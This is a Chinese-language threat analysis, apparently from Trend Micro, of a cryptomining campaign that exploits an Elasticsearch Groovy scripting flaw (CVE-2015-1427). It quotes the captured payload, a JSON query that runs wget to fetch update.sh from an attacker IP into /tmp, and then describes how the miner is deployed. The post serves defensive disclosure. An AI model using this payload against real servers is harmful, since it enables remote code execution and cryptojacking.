趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch （用Lucene程式庫開發的開放原始碼Java搜尋引擎）的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427（位在Groovy 腳本引擎，讓遠端攻擊者可以用特製腳本來執行任意 shell 命令）以及CVE-2014-320（Elasticsearch預設設定內的漏洞）。Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢（ISC也在一篇文章中提到）：

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P

/tmp/sssooo\”).getText()”}}}”

這命令是由同個系統/攻擊主機執行，後續病毒也是放在此主機上。在本文編寫時，使用此IP的是網域matrixhazel[.]com（無法連上）。此系統安裝的是CentOS 6，同時運行了網頁伺服器和SSH伺服器。

圖1、GreyNotes將此這主機標記為已知掃描器

要注意的是，這種攻擊並不新鮮，只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒，包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“（因為大多數系統對/tmp的限制較少）。

這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令，就可以提升權限，甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是，雖然大多數案例的攻擊手法相同，但所使用的惡意檔案可能不同。在我們所分析的案例中，使用的是update.sh。一但執行腳本update.sh就會下載檔案devtools和config.json。接著就會部署虛擬貨幣挖礦病毒（趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀